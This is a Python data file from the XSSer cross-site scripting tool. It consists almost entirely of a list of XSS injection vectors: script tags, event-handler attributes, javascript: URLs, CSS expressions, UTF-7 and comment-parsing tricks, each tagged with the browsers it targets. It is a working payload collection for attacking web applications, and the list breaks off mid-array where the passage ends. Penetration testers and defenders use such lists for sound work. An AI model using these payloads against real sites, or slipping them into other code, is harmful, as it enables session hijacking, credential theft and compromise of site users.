#!/usr/bin/env python
# -*- coding: utf-8 -*-"
# vim: set expandtab tabstop=4 shiftwidth=4:
"""
This file is part of the XSSer project, https://xsser.03c8.net

Copyright (c) 2010/2019 | psy <epsylon@riseup.net>

xsser is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
Software Foundation version 3 of the License.

xsser is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
details.

You should have received a copy of the GNU General Public License along
with xsser; if not, write to the Free Software Foundation, Inc., 51
Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
"""
## This file contains different XSS fuzzing vectors.
## If you have some new, please email me to [epsylon@riseup.net]
## Happy Cross Hacking! ;)

vectors = [	{ 'payload':'''">PAYLOAD''',
		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
        { 'payload':""""><SCRIPT>alert('PAYLOAD')</SCRIPT>""",
          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},	
        { 'payload':"""</TITLE>PAYLOAD""",
	      'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
		{ 'payload':""""><img src="x:x" onerror="PAYLOAD">""",
		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},		
		{ 'payload':"""<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=PAYLOAD>""",
		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
		{ 'payload':"""'';!--"<PAYLOAD>=&{()}" """,
		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},	
		{ 'payload':"""<IMG SRC="PAYLOAD">""",
		  'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
		{ 'payload':"""<IMG SRC=PAYLOAD>""",
  		  'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
		{ 'payload':"""<IMG SRC=`PAYLOAD`>""",
		  'browser':"""[IE6.0|NS8.1-IE]"""},
		{ 'payload':"""<IMG '''>PAYLOAD'>""",
		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
		{ 'payload':"""<IMG SRC=" &#14;  PAYLOAD">""",
	      'browser':"""[IE6.0|NS8.1-IE]"""},
		{ 'payload':"""<DIV STYLE="behaviour: url(PAYLOAD);">""",
		  'browser':"""[IE6.0|NS8.1-IE]"""},
        { 'payload':"""<<SCRIPT>PAYLOAD//<</SCRIPT>""",
		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
		{ 'payload':"""\";PAYLOAD//""",
		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
		{ 'payload':"""<IMG SRC='PAYLOAD'""",
		  'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
		{ 'payload':"""<BODY BACKGROUND="PAYLOAD">""",
		  'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
		{ 'payload':"""<INPUT TYPE="IMAGE" SRC="PAYLOAD">""",
		  'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
        { 'payload':"""<BODY ONLOAD=PAYLOAD>""",
	      'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
		{ 'payload':"""<IMG DYNSRC="PAYLOAD">""",
		  'browser':"""[IE6.0|NS8.1-IE]"""},
		{ 'payload':"""<IMG LOWSRC="PAYLOAD">""",
		  'browser':"""[IE6.0|NS8.1-IE]"""},
		{ 'payload':"""<BGSOUND SRC="PAYLOAD">""",
	      'browser':"""[O9.02]"""},
        { 'payload':"""<BR SIZE="&{PAYLOAD}">""",
		  'browser':"""[NS4]"""},
		{ 'payload':"""<LINK REL="stylesheet" HREF="PAYLOAD">""",
		  'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
		{ 'payload':"""<IMG SRC='vbscript:PAYLOAD'>""",
	   	  'browser':"""[IE6.0|NS8.1-IE]"""},
		{ 'payload':"""<IMG SRC="mocha:[PAYLOAD]">""",
	   	  'browser':"""[NS4]"""},
	 	{ 'payload':"""<IMG SRC="livescript:[PAYLOAD]">""",
	  	  'browser':"""[NS4]"""},
	 	{ 'payload':"""<META HTTP-EQUIV="refresh" CONTENT="0;url=PAYLOAD">""",
	   	  'browser':"""[IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
	 	{ 'payload':"""<TABLE BACKGROUND="PAYLOAD">""",
	      'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
        { 'payload':"""<TABLE BACKGROUND=javascript:PAYLOAD>""",
          'browser':"""[O9.02]"""},
		{ 'payload':"""<TABLE><TD BACKGROUND="PAYLOAD">""",
		  'browser':"""[IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
		{ 'payload':"""<DIV STYLE="background-image: url(PAYLOAD);">""",
		  'browser':"""[IE6.0|NS8.1-IE]"""},			  
		{ 'payload':"""<DIV STYLE="width: expression(PAYLOAD);">""",
		  'browser':"""[IE7.0|IE6.0|NS8.1-IE]"""},
		{ 'payload':"""<IFRAME SRC="PAYLOAD"></IFRAME>""",
		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
        { 'payload':"""<iframe/ /onload=PAYLOAD></iframe>""",
          'browser':"""Not Info"""},
        { 'payload':"""<iframe/ "onload=PAYLOAD></iframe>""",
          'browser':"""Not Info"""},
        { 'payload':"""<iframe///////onload=PAYLOAD></iframe>""",
          'browser':"""Not Info"""},
        { 'payload':"""<iframe "onload=PAYLOAD></iframe>""",
          'browser':"""Not Info"""},
        { 'payload':"""<iframe<?php echo chr(11)?> onload=PAYLOAD></iframe>""",
          'browser':"""Not Info"""},
        { 'payload':"""<iframe<?php echo chr(12)?> onload=PAYLOAD></iframe>""",
          'browser':"""Not Info"""},
   		{ 'payload':"""<FRAMESET><FRAME SRC="PAYLOAD"></FRAMESET>""",
		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
		{ 'payload':"""<TABLE BACKGROUND="PAYLOAD">""",
		  'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
		{ 'payload':"""<TABLE><TD BACKGROUND="PAYLOAD">""",
  		  'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""}, 			  
		{ 'payload':"""<DIV STYLE="background-image: url(&#1;PAYLOAD)">""",
		  'browser':"""[IE6.0|NS8.1-IE]"""},
   		{ 'payload':"""<DIV STYLE="width: expression(PAYLOAD);">""",
		  'browser':"""[IE7.0|IE6.0|NS8.1-IE]"""},
		{ 'payload':"""<IMG STYLE="X:expr/*X*/ession(PAYLOAD)">""",
  		  'browser':"""[IE7.0|IE6.0|NS8.1-IE]"""}, 
		{ 'payload':"""<X STYLE="X:expression(PAYLOAD)">""",
		  'browser':"""[IE7.0|IE6.0|NS8.1-IE]"""},			  
   		{ 'payload':"""<STYLE TYPE="text/javascript">PAYLOAD</STYLE>""",
		  'browser':"""[NS4]"""},
		{ 'payload':"""<STYLE>.X{background-image:url("PAYLOAD");}</STYLE><A CLASS=X></A>""",
		  'browser':"""[IE6.0|NS8.1-IE]"""},
		{ 'payload':"""<STYLE type="text/css">BODY{background:url("PAYLOAD")}</STYLE>""",
  		  'browser':"""[IE6.0|NS8.1-IE]"""}, 		  
		{ 'payload':"""<!--[if gte IE 4]>PAYLOAD<![endif]-->""",
		  'browser':"""[IE7.0|IE6.0|NS8.1-IE]"""},
   		{ 'payload':"""<BASE HREF="PAYLOAD//">""",
		  'browser':"""[IE6.0|NS8.1-IE]"""},
		{ 'payload':"""<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=PAYLOAD></OBJECT>""",
		  'browser':"""[O9.02]"""},
		{ 'payload':"""a="get";b="URL(\"";c="javascript:";d="PAYLOAD\")";eval(a+b+c+d);""",
  		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""}, 		  
		{ 'payload':"""<? echo('<SCR)';echo('IPT>PAYLOAD</SCRIPT>'); ?>""",
  		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""}, 		  
		{ 'payload':"""<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;PAYLOAD&lt;/SCRIPT&gt;">""",
		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},	 
		{ 'payload':"""<SCRIPT SRC=http://127.0.0.1>PAYLOAD</SCRIPT>""", 
		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
		{ 'payload':"""<IMG SRC="&14;javascript:PAYLOAD">""",
		  'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
        { 'payload':"""<IMG SRC="jav&#x0D;ascript:PAYLOAD">""",
          'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
        { 'payload':"""--- <IMG SRC=" &#14;  PAYLOAD">""",
          'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
        { 'payload':'''--- <IMG SRC="PAYLOAD"''',
          'browser':"""[IE6.0|NS8.1-IE] [09.02]"""},
        { 'payload':"""<SCRIPT>a=/PAYLOAD/alert(a.source)</SCRIPT>""",
          'browser':"""[Not Info]"""},
        { 'payload':'''--- \";PAYLOAD;//''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<META HTTP-EQUIVo"refresh" CONTENT="0; URL=http://;URL=PAYLOAD">''',
          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
		{ 'payload':"""<SCRIPT <B>=PAYLOAD"></SCRIPT>""",
		  'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},	 
		{ 'payload':"""<IFRAME SRC="javascript:PAYLOAD <""",
		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
		{ 'payload':"""<SCRIPT>a=/X/nPAYLOAD</SCRIPT>""",
		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
		{ 'payload':"""<LAYER SRC="javascript:PAYLOAD></LAYER>""",
		  'browser':"""[NS4]"""},
		{ 'payload':"""<STYLE>li {list-style-image: url("PAYLOAD</STYLE><UL><LI>X""", 
		  'browser':"""[IE6.0|NS8.1-IE]"""},
		{ 'payload':"""<DIV STYLE="background-image: url(&#1;javascript:PAYLOAD">""",
		  'browser':"""[IE6.0|NS8.1-IE]"""},
		{ 'payload':"""<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"></HEAD>+ADw-SCRIPT+AD4-PAYLOAD+ADw-/SCRIPT+AD4-""",
		  'browser':"""[IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
		{ 'payload':"""<a href="javascript#PAYLOAD">""",
		  'browser':"""[IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
		{ 'payload':"""<input type="image" dynsrc="PAYLOAD">""",
		  'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
		{ 'payload':"""&PAYLOAD">""",
		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
		{ 'payload':"""&{PAYLOAD};""",
		  'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
		{ 'payload':"""<IMG SRC=&{PAYLOAD};>""",
		  'browser':"""[IE6.0|NS8.1-IE] [O9.02]"""},
		{ 'payload':"""<a href="about:PAYLOAD">""",
		  'browser':"""[IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"""},
		{ 'payload':"""<DIV STYLE="binding: url(javascript:PAYLOAD);">""",
		  'browser':"""[IE6.0|NS8.1-IE]"""},
		{ 'payload':"""<OBJECT classid=clsid:..." codebase="javascript:PAYLOAD">""",
		  'browser':"""[O9.02]"""},
		{ 'payload':"""<style><!--</style><SCRIPT>PAYLOAD//--></SCRIPT>""",
		  'browser':"""[IE6.0|NS8.1-IE]"""},
		{ 'payload':"""![CDATA[<!--]]<SCRIPT>PAYLOAD//--></SCRIPT>""",
		  'browser':"""[IE6.0|NS8.1-IE]"""},
		{ 'payload':"""<!-- -- -->PAYLOAD<!-- -- -->""",
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<xml id="X"><a><b>PAYLOAD;<b></a></xml>''',
		  'browser':"""[IE6.0|NS8.1-IE]"""},
		{ 'payload':'''<div datafld="b" dataformatas="html" datasrc="#PAYLOAD"></div>''',
		  'browser':"""[IE]"""},
		{ 'payload':'''<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:PAYLOAD">]]</C><X></xml>''',
		  'browser':"""[IE6.0|NS8.1-IE]"""},
        { 'payload':"""<script psy>/*<script* */alert(PAYLOAD)</script""",
          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
 		{ 'payload':'''<img src=1 href=1 onerror="PAYLOAD"></img>''',
          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
    	{ 'payload':'''<audio src=1 href=1 onerror="PAYLOAD"></audio>''',
          'browser':"""[HTML5 Injection]"""},
 		{ 'payload':'''<video src=1 href=1 onerror="PAYLOAD"></video>''',
          'browser':"""[HTML5 Injection]"""},
 		{ 'payload':'''<body src=1 href=1 onerror="PAYLOAD"></body>''',
          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
 		{ 'payload':'''<image src=1 href=1 onerror="PAYLOAD"></image>''',
          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
 		{ 'payload':'''<object src=1 href=1 onerror="PAYLOAD"></object>''',
          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
 		{ 'payload':'''<script src=1 href=1 onerror="PAYLOAD"></script>''',
          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
 		{ 'payload':'''<svg onResize svg onResize="javascript:PAYLOAD"></svg onResize>''',
          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
 		{ 'payload':'''<title onPropertyChange title onPropertyChange="javascript:PAYLOAD"></title onPropertyChange>''',
          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
 		{ 'payload':'''<iframe onLoad iframe onLoad="javascript:PAYLOAD"></iframe onLoad>''',
          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
 		{ 'payload':'''<body onMouseEnter body onMouseEnter="javascript:PAYLOAD"></body onMouseEnter>''',
          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
 		{ 'payload':'''<body onFocus body onFocus="javascript:PAYLOAD"></body onFocus>''',
          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
 		{ 'payload':'''<frameset onScroll frameset onScroll="javascript:PAYLOAD"></frameset onScroll>''',
          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
 		{ 'payload':'''<script onReadyStateChange script onReadyStateChange="javascript:PAYLOAD"></script onReadyStateChange>''',
          'browser':"""[IE] [Chrome]"""},
 		{ 'payload':'''<html onMouseUp html onMouseUp="javascript:PAYLOAD"></html onMouseUp>''',
          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
 		{ 'payload':'''<body onPropertyChange body onPropertyChange="javascript:PAYLOAD"></body onPropertyChange>''',
          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
 		{ 'payload':'''<svg onLoad svg onLoad="javascript:PAYLOAD"></svg onLoad>''',
          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
 		{ 'payload':'''<body onPageHide body onPageHide="javascript:PAYLOAD"></body onPageHide>''',
          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
 		{ 'payload':'''<body onMouseOver body onMouseOver="javascript:PAYLOAD"></body onMouseOver>''',
          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
 		{ 'payload':'''<body onUnload body onUnload="javascript:PAYLOAD"></body onUnload>''',
          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
 		{ 'payload':'''<body onLoad body onLoad="javascript:PAYLOAD"></body onLoad>''',
          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
 		{ 'payload':'''<bgsound onPropertyChange bgsound onPropertyChange="javascript:PAYLOAD"></bgsound onPropertyChange>''',
          'browser':"""[HTML5 Injection]"""},
 		{ 'payload':'''<html onMouseLeave html onMouseLeave="javascript:PAYLOAD"></html onMouseLeave>''',
          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
 		{ 'payload':'''<html onMouseWheel html onMouseWheel="javascript:PAYLOAD"></html onMouseWheel>''',
          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
 		{ 'payload':'''<style onLoad style onLoad="javascript:PAYLOAD"></style onLoad>''',
          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
 		{ 'payload':'''<iframe onReadyStateChange iframe onReadyStateChange="javascript:PAYLOAD"></iframe onReadyStateChange>''',
          'browser':"""[IE] [Chrome]"""},
 		{ 'payload':'''<body onPageShow body onPageShow="javascript:PAYLOAD"></body onPageShow>''',
          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
 		{ 'payload':'''<style onReadyStateChange style onReadyStateChange="javascript:PAYLOAD"></style onReadyStateChange>''',
          'browser':"""[IE] [Chrome]"""},
 		{ 'payload':'''<frameset onFocus frameset onFocus="javascript:PAYLOAD"></frameset onFocus>''',
          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
 		{ 'payload':'''<applet onError applet onError="javascript:PAYLOAD"></applet onError>''',
          'browser':"""[HTML5 Injection]"""},
       	{ 'payload':'''<marquee onStart marquee onStart="javascript:PAYLOAD"></marquee onStart>''',
          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
		{ 'payload':'''<script onLoad script onLoad="javascript:PAYLOAD"></script onLoad>''',
          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
		{ 'payload':'''<html onMouseOver html onMouseOver="javascript:PAYLOAD"></html onMouseOver>''',
          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
		{ 'payload':'''<html onMouseEnter html onMouseEnter="javascript:parent.PAYLOAD"></html onMouseEnter>''',
          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
		{ 'payload':'''<body onBeforeUnload body onBeforeUnload="javascript:PAYLOAD"></body onBeforeUnload>''',
          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
		{ 'payload':'''<html onMouseDown html onMouseDown="javascript:PAYLOAD"></html onMouseDown>''',
          'browser':"""[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [Opera] [Chrome]"""},
		{ 'payload':'''<marquee onScroll marquee onScroll="javascript:PAYLOAD"></marquee onScroll>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<xml onPropertyChange xml onPropertyChange="javascript:PAYLOAD"></xml onPropertyChange>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<frameset onBlur frameset onBlur="javascript:PAYLOAD"></frameset onBlur>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<applet onReadyStateChange applet onReadyStateChange="javascript:PAYLOAD"></applet onReadyStateChange>''',
		  'browser':"""[IE] [Chrome]"""},
		{ 'payload':'''<svg onUnload svg onUnload="javascript:PAYLOAD"></svg onUnload>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<html onMouseOut html onMouseOut="javascript:PAYLOAD"></html onMouseOut>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<body onMouseMove body onMouseMove="javascript:PAYLOAD"></body onMouseMove>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<body onResize body onResize="javascript:PAYLOAD"></body onResize>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<object onError object onError="javascript:PAYLOAD"></object onError>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<body onPopState body onPopState="javascript:PAYLOAD"></body onPopState>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<html onMouseMove html onMouseMove="javascript:PAYLOAD"></html onMouseMove>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<applet onerror applet onerror="javascript:PAYLOAD"></applet onerror>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<body onkeyup body onkeyup="javascript:PAYLOAD"></body onkeyup>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<body onunload body onunload="javascript:PAYLOAD"></body onunload>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<iframe onload iframe onload="javascript:PAYLOAD"></iframe onload>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<body onload body onload="javascript:PAYLOAD"></body onload>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<html onmouseover html onmouseover="javascript:PAYLOAD"></html onmouseover>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<object onbeforeload object onbeforeload="javascript:PAYLOAD"></object onbeforeload>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<body onbeforeunload body onbeforeunload="javascript:PAYLOAD"></body onbeforeunload>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<body onfocus body onfocus="javascript:PAYLOAD"></body onfocus>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<body onkeydown body onkeydown="javascript:PAYLOAD"></body onkeydown>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<iframe onbeforeload iframe onbeforeload="javascript:PAYLOAD"></iframe onbeforeload>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<iframe src iframe src="javascript:PAYLOAD"></iframe src>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<svg onload svg onload="javascript:PAYLOAD"></svg onload>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<body onblur body onblur="javascript:PAYLOAD"></body onblur>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<form id="X" /><button form="X" formaction="javascript:PAYLOAD">X''',
		  'browser':"""[HTML5 Injection]"""},
		{ 'payload':'''<input onfocus=PAYLOAD autofocus>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<input onblur=PAYLOAD autofocus><input autofocus>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<video poster=javascript:PAYLOAD//''',
		  'browser':"""[HTML5 Injection]"""},
		{ 'payload':'''<body onscroll=PAYLOAD><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<form id=X onforminput=PAYLOAD><input></form><button form=X onformchange=PAYLOAD>X''',
		  'browser':"""[HTML5 Injection]"""},
		{ 'payload':'''<video><source onerror="javascript:PAYLOAD">''',
		  'browser':"""[Opera10.5+] [Chrome]"""},
		{ 'payload':'''<video onerror="javascript:PAYLOAD"><source>''',
		  'browser':"""[FF3.5+]"""},
		{ 'payload':'''<form><button formaction="javascript:PAYLOAD">X''',
		  'browser':"""[HTML5 Injection]"""},
		{ 'payload':'''<body oninput=PAYLOAD><input autofocus>''',
		  'browser':"""[IE]"""},
		{ 'payload':'''<math href="javascript:PAYLOAD">CLICKME</math>  <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:PAYLOAD">CLICKME</maction> </math>''',
		  'browser':"""[FF]"""},
		{ 'payload':'''<frameset onload=PAYLOAD>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<table background="javascript:PAYLOAD">''',
		  'browser':"""[Opera8|Opera10.5+] [IE6.0]"""},
		{ 'payload':'''<!--<img src="--><img src=x onerror=PAYLOAD//">''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<comment><img src="</comment><img src=x onerror=PAYLOAD)//">''',
		  'browser':"""[IE]"""},
		{ 'payload':'''<![><img src="]><img src=x onerror=PAYLOAD//">''',
		  'browser':"""[FF] [Opera]"""},
		{ 'payload':'''<style><img src="</style><img src=x onerror=PAYLOAD//">''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<li style=list-style:url() onerror=PAYLOAD> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=PAYLOAD></div>''',
		  'browser':"""[Opera10.5+]"""},
		{ 'payload':'''<head><base href="javascript://"></head><body><a href="/. /,PAYLOAD//#">XXX</a></body>''',
		  'browser':"""[Opera8|Opera10.5] [IE]"""},
		{ 'payload':'''<SCRIPT FOR=document EVENT=onreadystatechange>PAYLOAD</SCRIPT>''',
		  'browser':"""[Opera] [IE]"""},
		{ 'payload':'''<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(PAYLOAD)"></OBJECT>''',
		  'browser':"""[IE9.0]"""},
		{ 'payload':'''<b <script>alert(PAYLOAD)</script>0''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<div id="div1"><input value="``onmouseover=PAYLOAD"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':"""<x '='foo'><x foo='><img src=x onerror=PAYLOAD//'>""",
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<div style=width:1px;filter:glow onfilterchange=PAYLOAD>x''',
		  'browser':"""[IE]"""},
		{ 'payload':"""<x '="foo"><x foo='><img src=x onerror=PAYLOAD//'>""",
		  'browser':"""[IE6.0]"""},
		{ 'payload':'''<? foo="><script>PAYLOAD</script>">''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<! foo="><script>PAYLOAD</script>">''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''</ foo="><script>PAYLOAD</script>">''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<? foo="><x foo="?><script>PAYLOAD</script>">">''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<! foo="[[[Inception]]"><x foo="]foo><script>PAYLOAD</script>">''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<% foo><x foo="%><script>PAYLOAD</script>">''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<div id=d><x xmlns="><iframe onload=PAYLOAD"></div> <script>d.innerHTML=d.innerHTML</script>''',
		  'browser':"""[IE]"""},
		{ 'payload':'''<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:PAYLOAD>XXX</a>''',
		  'browser':"""[Safari] [Chrome]"""},
		{ 'payload':'''<img src="x` `<script>PAYLOAD</script>"` `>''',
		  'browser':"""[IE]"""},
		{ 'payload':'''<img src onerror /" '"= alt=PAYLOAD//">''',
		  'browser':"""[Safari]"""},
		{ 'payload':'''<title onpropertychange=PAYLOAD></title><title title=>''',
		  'browser':"""[IE9.0]"""},
		{ 'payload':'''<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=PAYLOAD></a>">''',
		  'browser':"""[IE]"""},
		{ 'payload':'''<!--[if]><script>PAYLOAD</script -->''',
		  'browser':"""[IE]"""},
		{ 'payload':'''<!--[if<img src=x onerror=PAYLOAD//]> -->''',
		  'browser':"""[IE]"""},
		{ 'payload':'''<script src="/\PAYLOAD"></script>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<script src="\\PAYLOAD"></script>''',
		  'browser':"""[Not Info]"""},
